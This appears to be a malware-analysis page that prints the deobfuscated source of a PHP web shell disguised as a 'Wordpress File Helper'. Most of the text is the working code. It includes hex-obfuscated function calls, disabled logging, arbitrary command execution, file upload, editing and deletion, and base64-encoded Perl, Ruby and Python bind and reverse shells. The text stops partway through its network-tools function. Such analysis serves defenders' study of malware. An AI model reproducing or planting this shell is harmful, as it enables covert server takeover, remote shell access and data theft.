PHP Malware Analysis

1CTT.php, lCT.php

md5: fe48a2bd0d2c4060ff976ec41e0cdc3c

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Input

Title

URLs


Deobfuscated PHP code

<?php

$shellName = 'Wordpress File Helper';
$logo = 'https://image.flaticon.com/icons/png/512/2959/2959607.png';
$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65", "7363616e646972", "73797374656d", "65786563", "7061737374687275", "7368656c6c5f65786563", "6f625f6765745f636f6e74656e7473", "6f625f656e645f636c65616e", "6469726e616d65", "6469736b5f746f74616c5f7370616365", "6469736b5f667265655f7370616365", "696e695f676574", "707265675f6d617463685f616c6c", "706f7369785f6765747077756964", "706f7369785f6765746772676964", "70617468696e666f", "66696c656f776e6572", "66696c6567726f7570", "66696c6574797065", "676574686f73746e616d65", "676574686f737462796e616d65", "737562737472", "737472737472", "696e695f736574", "66696c65", "7374725f7265706c616365", "6578706c6f6465", "6576616c", "6f625f7374617274", "66756e6374696f6e5f657869737473", "6572726f725f7265706f7274696e67", "7365745f74696d655f6c696d6974", "636c656172737461746361636865", "646174655f64656661756c745f74696d657a6f6e655f736574", "666c757368", "7374726c656e", "7472696d", "656d707479", "6973736574", "66696c657065726d73", "7374726c656e", "636f756e74", "726f756e64", "6d696d655f636f6e74656e745f74797065", "6765745f63757272656e745f75736572", "6765746d79756964", "6765746d79676964", "706f7369785f67657465756964", "706f7369785f67657465676964", "616464736c6173686573", "73796d6c696e6b", "726d646972", "756e6c696e6b", "61727261795f6d6170", "676c6f62", "686561646572", "706f70656e", "69735f7265736f75726365", "66656f66", "6672656164", "70636c6f7365", "70726f635f6f70656e", "73747265616d5f6765745f636f6e74656e7473", "636c6173735f657869737473", "737072696e7466", "63686d6f64", "666f70656e", "667772697465", "6261736536345f6465636f6465", "66736f636b6f70656e", "6670757473", "6667657473", "66636c6f7365"];
for ($i = 0; $i < count($func); $i++) {
    $func[$i] = dehex($func[$i]);
}
session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors', 0);
@$func[43]('max_execution_time', 0);
@$func[43]('output_buffering', 0);
@$func[43]('display_errors', 0);
$func[53]("Asia/Jakarta");
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $func[3]($dir);
} else {
    $dir = $func[2]();
}
if ($func[12]("/etc/named.conf")) {
    $d0mains = read("/etc/named.conf");
    if (!$d0mains) {
        $dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
    } else {
        $count = 0;
        foreach ($d0mains as $d0main) {
            if (@$func[42]($d0main, "zone")) {
                $func[32]('#zone "(.*)"#', $d0main, $domains);
                $func[54]();
                if ($func[55]($func[56]($domains[1][0])) > 2) {
                    $func[54]();
                    $count++;
                }
            }
        }
        if ($count > 0) {
            $dom = "<font class='text-success'>{$count} Domain</font>";
        } else {
            $dom = "<font class='text-warning'>Can't get Domain</font>";
        }
    }
} else {
    $dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
}
$dir = $func[45]("\\", "/", $dir);
$scdir = $func[46]("/", $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers = (int) ($free / $total * 100);
$ds = @$func[31]("disable_functions");
$show_ds = !empty($ds) ? "<font class='text-danger'>{$ds}</font>" : "<font class='text-success'>All function is accessible</font>";
$cmd_uname = exe("uname -a");
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {
    $sys = "win";
} else {
    $sys = "unix";
}
if (isset($_GET['do'])) {
    $do = $_GET['do'];
    if ($do == 'delete') {
        if ($func[12]($dir)) {
            if (deleter($dir)) {
                flash("File/Folder deleted successfully!", "Success", "success", "?dir=" . $func[28]($dir));
            } else {
                flash("File/Folder failed to delete!", "Failed", "danger");
            }
        } else {
            flash("File/Folder is doesn't exist!", "Failed", "warning");
        }
    } else {
        if ($do == 'get-source') {
            if (isset($_GET['filename'])) {
                die($func[14]($_GET['filename']));
            }
        } else {
            if ($do == 'terminal') {
                if (isset($_GET['command'])) {
                    die('<pre>' . exe($_GET['command']) . '</pre>');
                }
            } else {
                if ($do == 'jumping') {
                    die(jumping());
                } else {
                    if ($do == 'get-config') {
                        die(getConfig());
                    } else {
                        if ($do == 'bind-port') {
                            if (isset($_GET['port'])) {
                                die(networkTools(1, $_GET['port']));
                            }
                        } else {
                            if ($do == 'back-connect') {
                                if (isset($_GET['host']) && isset($_GET['port'])) {
                                    die(networkTools(2, $_GET['port'], $_GET['host'], $_GET['with']));
                                }
                            }
                        }
                    }
                }
            }
        }
    }
} else {
    $do = 'filesman';
    $title = 'Files Manager';
    $icon = 'archive';
}
isset($_POST["foldername"]) ? $func[12]("{$dir}/{$_POST['foldername']}") ? flash("Folder name is exist!", "Failed", "warning") : ($func[15]("{$dir}/{$_POST['foldername']}") ? flash("Folder created successfully!", "Success", "success") : flash("Folder failed to create!", "Failed", "danger")) : null;
isset($_POST["filename"]) && isset($_POST['filecontent']) ? $func[12]("{$dir}/{$_POST['filename']}") ? flash("File name is exist!", "Failed", "warning") : ($func[13]("{$dir}/{$_POST['filename']}", $_POST['filecontent']) ? flash("File created successfully!", "Success", "success") : flash("File failed to create!", "Failed", "danger")) : null;
isset($_POST["newname"]) && isset($_POST['oldname']) ? $func[12]("{$dir}/{$_POST['newname']}") ? flash("File/Folder name is exist!", "Failed", "warning") : ($func[16]("{$dir}/{$_POST['oldname']}", $_POST['newname']) ? flash("File/Folder renamed successfully!", "Success", "success") : flash("File/Folder failed to rename!", "Failed", "danger")) : null;
isset($_POST["filename"]) && isset($_POST['content']) ? $func[13]("{$dir}/{$_POST['filename']}", $_POST['content']) ? flash("File saved successfully!", "Success", "success") : flash("File failed to save!", "Failed", "danger") : null;
isset($_POST["filename"]) && isset($_POST['perm']) ? $func[85]("{$dir}/{$_POST['filename']}", $_POST['perm']) ? flash("File permission changed successfully!", "Success", "success") : flash("File permission failed to change!", "Failed", "danger") : null;
if (isset($_FILES["uploadfile"])) {
    $n = $_FILES["uploadfile"]["name"];
    for ($i = 0; $i < $func[61]($n); $i++) {
        if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) {
            flash("File uploaded successfully!", "Success", "success");
        } else {
            flash("File failed to upload!", "Failed", "danger");
        }
    }
}
if (@$func[31]('open_basedir')) {
    $basedir_data = @$func[31]('open_basedir');
    if ($func[55]($basedir_data) > 120) {
        $open_b = "<font class='text-success'>" . $func[41]($basedir_data, 0, 120) . "...</font>";
    } else {
        $open_b = '<font class="text-success">' . $basedir_data . '</font>';
    }
} else {
    $open_b = '<font class="text-warning">NONE</font>';
}
if (!$func[49]('posix_getegid')) {
    $user = $func[49]("get_current_user") ? @$func[64]() : "????";
    $uid = $func[49]("getmyuid") ? @$func[65]() : "????";
    $gid = $func[49]("getmygid") ? @$func[66]() : "????";
    $group = "?";
} else {
    $uid = $func[49]("posix_getpwuid") && $func[49]("posix_geteuid") ? @$func[33]($func[67]()) : ["name" => "????", "uid" => "????"];
    $gid = $func[49]("posix_getgrgid") && $func[49]("posix_getegid") ? @$func[34]($func[68]()) : ["name" => "????", "gid" => "????"];
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}
if ($sys == 'unix') {
    if (!@$func[31]('safe_mode')) {
        if ($func[55](exe("id")) > 0) {
            $userful = ['gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl', 'git', 'docker', 'ssh'];
            $x = 0;
            foreach ($userful as $i) {
                if (which($i)) {
                    $x++;
                    $useful .= $i . ', ';
                }
            }
            if ($x == 0) {
                $useful = '--------';
            }
            $downloaders = ['wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'];
            $x = 0;
            foreach ($downloaders as $i) {
                if (which($i)) {
                    $x++;
                    $downloader .= $i . ', ';
                }
            }
            if ($x == 0) {
                $downloader = '--------';
            }
        } else {
            $useful = '--------';
            $downloader = '--------';
        }
    } else {
        $useful = '--------';
        $downloader = '--------';
    }
}
function hex($str)
{
    global $func;
    $r = "";
    for ($i = 0; $i < $func[55]($str); $i++) {
        $r .= dechex(ord($str[$i]));
    }
    return $r;
}
function dehex($str)
{
    $r = "";
    $len = strlen($str) - 1;
    for ($i = 0; $i < $len; $i += 2) {
        $r .= chr(hexdec($str[$i] . $str[$i + 1]));
    }
    return $r;
}
function formatSize($bytes)
{
    global $func;
    $types = array('B', 'KB', 'MB', 'GB', 'TB');
    for ($i = 0; $bytes >= 1024 && $i < $func[61]($types) - 1; $bytes /= 1024, $i++) {
    }
    return $func[62]($bytes, 2) . " " . $types[$i];
}
function perms($file)
{
    global $func;
    $perms = $func[59]($file);
    if (($perms & 0xc000) == 0xc000) {
        $info = 's';
    } elseif (($perms & 0xa000) == 0xa000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $func[41]($func[84]('%o', $perms), -4) . ' >> ' . $info;
}
function exe($in)
{
    global $func;
    $out = '';
    try {
        if ($func[49]('exec')) {
            @$func[23]($in, $out);
            $out = @join("\n", $out);
            return $out;
        } elseif ($func[49]('passthru')) {
            $func[48]();
            @$func[24]($in);
            $out = $func[27]();
            return $out;
        } elseif ($func[49]('system')) {
            $func[48]();
            @$func[22]($in);
            $out = $func[27]();
            return $out;
        } elseif ($func[49]('shell_exec')) {
            $out = $func[25]($in);
            return $out;
        } elseif ($func[49]("popen") && $func[49]("pclose")) {
            if ($func[77]($f = @$func[76]($in, "r"))) {
                $out = "";
                while (!@$func[78]($f)) {
                    $out .= $func[79]($f, 1024);
                }
                $func[80]($f);
                return $out;
            }
        } elseif ($func[49]('proc_open')) {
            $pipes = [];
            $process = @$func[81]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
            $out = @$func[82]($pipes[1]);
            return $out;
        } elseif ($func[83]('COM')) {
            $ws = new COM('WScript.shell');
            $exec = $ws->exec('cmd.exe /c ' . $in);
            $stdout = $exec->StdOut();
            $out = $stdout->ReadAll();
            return $out;
        }
    } catch (Exception $e) {
    }
    return $out;
}
function checkName($name)
{
    global $func;
    if ($func[55]($name) > 18) {
        return $func[41]($name, 0, 18) . "...";
    }
    return $name;
}
function checkPerm($dir, $perm)
{
    global $func;
    $perm = $func[46]('>>', $perm);
    if ($func[8]($dir)) {
        return "<font class='text-success' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[0] . "</font> >> <font class='text-success' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[1] . "</font>";
    } elseif (!$func[9]($dir)) {
        return "<font class='text-danger' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[0] . "</font> >> <font class='text-danger' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[1] . "</font>";
    } else {
        return "<font class='text-secondary' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[0] . "</font> >> <font class='text-secondary' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='" . trim($perm[0]) . "' data-bs-name='" . $dir . "'>" . $perm[1] . "</font>";
    }
}
function getowner($item)
{
    global $func;
    if ($func[49]("posix_getpwuid")) {
        $downer = @$func[33]($func[36]($item));
        $downer = $downer['name'];
    } else {
        $downer = $func[36]($item);
    }
    if ($func[49]("posix_getgrgid")) {
        $dgrp = @$func[34]($func[37]($item));
        $dgrp = $dgrp['name'];
    } else {
        $dgrp = $func[37]($item);
    }
    return $downer . '/' . $dgrp;
}
function geticon($file)
{
    global $func;
    $ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
    if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
        return "file-code";
    } else {
        if ($ext == 'pdf') {
            return "file-pdf";
        } else {
            if ($ext == 'txt') {
                return "file-alt";
            } else {
                if ($ext == 'csv') {
                    return "file-csv";
                } else {
                    if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
                        return "file-image";
                    } else {
                        if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
                            return "file-video";
                        } else {
                            if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
                                return "file-word";
                            } else {
                                if ($ext == 'ppt' || $ext == 'pptx') {
                                    return "file-powerpoint";
                                } else {
                                    if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
                                        return "file-excel";
                                    } else {
                                        if ($ext == 'mp3' || $ext == 'wav') {
                                            return "file-audio";
                                        } else {
                                            if ($ext == 'sql' || $ext == 'db') {
                                                return "database";
                                            } else {
                                                if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
                                                    return "file-archive";
                                                } else {
                                                    return "file";
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
function which($p)
{
    global $func;
    $path = exe('which ' . $p);
    if (!empty($path)) {
        return $func[55]($path);
    }
    return false;
}
function flash($message, $status, $class, $redirect = false)
{
    if (!empty($_SESSION["message"])) {
        unset($_SESSION["message"]);
    }
    if (!empty($_SESSION["class"])) {
        unset($_SESSION["class"]);
    }
    if (!empty($_SESSION["status"])) {
        unset($_SESSION["status"]);
    }
    $_SESSION["message"] = $message;
    $_SESSION["class"] = $class;
    $_SESSION["status"] = $status;
    if ($redirect) {
        $func[75]('Location: ' . $redirect);
        exit;
    }
    return true;
}
function clear()
{
    if (!empty($_SESSION["message"])) {
        unset($_SESSION["message"]);
    }
    if (!empty($_SESSION["class"])) {
        unset($_SESSION["class"]);
    }
    if (!empty($_SESSION["status"])) {
        unset($_SESSION["status"]);
    }
    return true;
}
function deleter($d)
{
    global $func;
    if ($func[56]($func[35]($d, PATHINFO_BASENAME), '.') === '') {
        return false;
    }
    if ($func[6]($d)) {
        $func[73]("deleter", $func[74]($d . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
        $func[71]($d);
        return true;
    } else {
        $func[72]($d);
        return true;
    }
    return false;
}
function read($file)
{
    global $func;
    $array = @$func[44]($file);
    if (!$array) {
        if ($func[60](exe("id")) > 0) {
            $data = exe('cat "' . $func[69]($file) . '"');
            if ($func[60]($data) > 0) {
                return $func[46]("\n", $data);
            } else {
                return false;
            }
        } else {
            return false;
        }
    } else {
        return $array;
    }
}
function networkTools($type, $port, $host = null, $with = 'php')
{
    global $func;
    if ($type == 1) {
        $bp = $func[88]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
        $brt = @$func[86]('bp.pl', 'w');
        $func[87]($brt, $bp);
        $out = exe("perl bp.pl {$port} 1>/dev/null 2>&1 &");
        sleep(1);
        $res = "<pre>{$out}\n" . exe("ps aux | grep bp.pl") . "</pre>";
        $func[72]("bp.pl");
        return $res;
    } else {
        if ($with == 'ruby') {
            $cont = $func[88]("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
            $bc = $func[86]('bcrb.rb', 'w');
            $func[87]($bc, $cont);
            $out = exe("ruby bcrb.rb {$host} {$port}");
            sleep(1);
            $res = "<pre>{$out}\n" . exe("ps aux | grep bcrb.rb") . "</pre>";
            $func[72]("bcrb.rb");
            return $res;
        } else {
            if ($with == 'python') {
                $cont = $func[88]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
                $bc = $func[86]('bcpy.py', 'w');
                $func[87]($bc, $cont);
                $out = exe("python bcpy.py {$host} {$port}");
                sleep(1);
                $res = "<pre>{$out}\n" . exe("ps aux | grep bcpy.py") . "</pre>";
                $func[72]("bcpy.py");
                return $res;
            } else {
                if ($with == 'perl') {
                    $cont = $func[88]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
                    $bc = $func[86]('bcpl.pl', 'w');
                    $func[87]($bc, $cont);
                    $out = exe("perl bcpl.pl {$host} {$port} 1>/dev/null 2>&1 &");
                    sleep(1);
                    $res = "<pre>{$out}\n" . exe("ps aux | grep bcpl.pl") . "</pre>";
                    $func[72]("bcpl.pl");
                    return $res;
                } else {
